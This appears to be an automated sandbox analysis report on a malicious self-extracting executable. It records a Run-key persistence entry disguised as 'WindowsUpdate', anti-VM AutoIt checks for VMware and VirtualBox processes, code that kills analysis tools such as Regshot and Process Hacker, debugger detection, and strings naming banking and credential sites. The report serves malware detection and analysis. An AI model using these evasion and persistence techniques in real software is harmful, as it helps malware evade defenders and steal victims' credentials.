            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.2646917691.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, EhStorAuthn.exe, 00000016.00000002.3358640633.00000000045A0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2649299700.00000000043FA000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3358640633.000000000473E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2646727901.0000000004249000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 0000000F.00000002.2646695656.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000002.3356279452.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
            Source: FS04dlvJrq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: FS04dlvJrq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: FS04dlvJrq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: FS04dlvJrq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: FS04dlvJrq.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D65D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,8_2_00D65D78
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4399937Jump to behavior
            Source: FS04dlvJrq.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E86680 push ecx; ret 0_2_00E86693
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E85773 push ecx; ret 0_2_00E85786
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_3_01A34F24 pushad ; ret 8_3_01A34F41

            Persistence and Installation Behavior

            barindex
            Uses ipconfig to lookup or modify the Windows network settings
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmFile created: C:\Users\user\AppData\Roaming\uhex\bpqdpksed.icmJump to dropped file
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmFile created: C:\Users\user\AppData\Roaming\uhex\bpqdpksed.icm.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm.exeJump to dropped file
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmFile created: C:\Users\user\AppData\Roaming\uhex\bpqdpksed.icmJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run WindowsUpdateJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DF25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,8_2_00DF25A0
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D7FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,8_2_00D7FC8A
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM autoit script
            Source: Yara matchFile source: Process Memory Space: bpqdpksed.icm PID: 5156, type: MEMORYSTR
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_8-97317
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: bpqdpksed.icm, 00000008.00000003.2401256601.000000000187D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281306225.0000000001864000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402219549.0000000001881000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281363015.0000000001875000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")D
            Source: bpqdpksed.icm, 00000008.00000003.2402832390.000000000192F000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403656375.0000000001930000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402574812.000000000192E000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401698198.0000000001928000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
            Source: bpqdpksed.icm, 00000008.00000003.2401256601.000000000187D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402559205.000000000188B000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403420574.000000000188B000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281306225.0000000001864000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401299815.0000000001889000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281363015.0000000001875000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")^
            Source: bpqdpksed.icm, 00000008.00000003.2402832390.000000000192F000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403656375.0000000001930000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402574812.000000000192E000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401698198.0000000001928000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXESR
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000846D000.00000004.00000020.00020000.00000000.sdmp, vbepwhj.mp3.8.dr, vbepwhj.mp3.0.drBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
            Source: bpqdpksed.icm, 00000008.00000003.2402832390.000000000192F000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403656375.0000000001930000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402574812.000000000192E000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401698198.0000000001928000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGSHOT.EXE]
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000846D000.00000004.00000020.00020000.00000000.sdmp, vbepwhj.mp3.8.dr, vbepwhj.mp3.0.drBinary or memory string: PROCESSCLOSE("REGSHOT.EXE")
            Source: bpqdpksed.icm, 00000008.00000003.2401256601.000000000187D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403402785.0000000001882000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281306225.0000000001864000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402219549.0000000001881000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281363015.0000000001875000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
            Source: FS04dlvJrq.exe, 00000000.00000003.2148241158.0000000007A6D000.00000004.00000020.00020000.00000000.sdmp, vbepwhj.mp3.8.dr, vbepwhj.mp3.0.drBinary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0142096E rdtsc 15_2_0142096E
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeWindow / User API: threadDelayed 2267Jump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeWindow / User API: threadDelayed 7706Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmAPI coverage: 5.3 %
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 3040Thread sleep count: 2267 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 3040Thread sleep time: -4534000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 3040Thread sleep count: 7706 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 3040Thread sleep time: -15412000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe TID: 6284Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E6F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00E6F826
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E81630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00E81630
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E91FF8 FindFirstFileExA,0_2_00E91FF8
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DCE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,8_2_00DCE387
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DCD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00DCD836
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DCDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00DCDB69
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DD9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00DD9F9F
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DDA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00DDA0FA
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DDA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_00DDA488
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DD65F1 FindFirstFileW,FindNextFileW,FindClose,8_2_00DD65F1
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D9C642 FindFirstFileExW,8_2_00D9C642
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DD72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,8_2_00DD72E9
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DD7248 FindFirstFileW,FindClose,8_2_00DD7248
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022FC200 FindFirstFileW,FindNextFileW,FindClose,22_2_022FC200
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E84E14 VirtualQuery,GetSystemInfo,0_2_00E84E14
            Source: 7kHDEL15.22.drBinary or memory string: discord.comVMware20,11696487552f
            Source: vbepwhj.mp3.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
            Source: 7kHDEL15.22.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 7kHDEL15.22.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 7kHDEL15.22.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 7kHDEL15.22.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 7kHDEL15.22.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: EhStorAuthn.exe, 00000016.00000002.3361591010.00000000076F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: COM.HKVMware20,jYt
            Source: 7kHDEL15.22.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: 7kHDEL15.22.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 7kHDEL15.22.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: 7kHDEL15.22.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: bpqdpksed.icm, 00000008.00000003.2281363015.0000000001875000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
            Source: 7kHDEL15.22.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: firefox.exe, 00000018.00000002.2995829898.000001CA59C9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
            Source: 7kHDEL15.22.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: vbepwhj.mp3.0.drBinary or memory string: If ProcessExists("VboxService.exe") Then
            Source: 7kHDEL15.22.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: bpqdpksed.icm, 00000008.00000003.2402044171.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401355186.00000000018C3000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402065265.00000000018D2000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401211605.00000000018BC000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401579053.00000000018C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exeOS
            Source: bpqdpksed.icm, 00000008.00000003.2281306225.0000000001864000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000002.2403369115.0000000001878000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2402357994.0000000001878000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2401436869.0000000001877000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2281363015.0000000001875000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
            Source: vbepwhj.mp3.8.dr, vbepwhj.mp3.0.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
            Source: 7kHDEL15.22.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: bpqdpksed.icm, 00000008.00000003.2281363015.0000000001875000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
            Source: bpqdpksed.icm, 00000008.00000003.2401256601.000000000187D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rocessExists("VboxService.exe") Then
            Source: 7kHDEL15.22.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 7kHDEL15.22.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: bpqdpksed.icm, 00000008.00000002.2403293170.0000000001848000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then7i
            Source: bpqdpksed.icm, 00000008.00000003.2401579053.00000000018C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.execroso
            Source: 7kHDEL15.22.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: 7kHDEL15.22.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: bpqdpksed.icm, 00000008.00000003.2401579053.00000000018C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exeyS
            Source: vbepwhj.mp3.0.drBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
            Source: EhStorAuthn.exe, 00000016.00000002.3355997152.000000000286A000.00000004.00000020.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3355893748.000000000088F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 7kHDEL15.22.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 7kHDEL15.22.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: bpqdpksed.icm, 00000008.00000003.2401256601.000000000187D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
            Source: EhStorAuthn.exe, 00000016.00000002.3361591010.00000000076F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tion PasswordVMware20,11696487552}
            Source: 7kHDEL15.22.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 7kHDEL15.22.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 7kHDEL15.22.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 7kHDEL15.22.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 7kHDEL15.22.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 7kHDEL15.22.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: bpqdpksed.icm, 00000008.00000003.2401579053.00000000018C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exe/n
            Source: 7kHDEL15.22.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 7kHDEL15.22.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 7kHDEL15.22.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: 7kHDEL15.22.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 7kHDEL15.22.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeAPI call chain: ExitProcess graph end nodegraph_0-30469
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0142096E rdtsc 15_2_0142096E
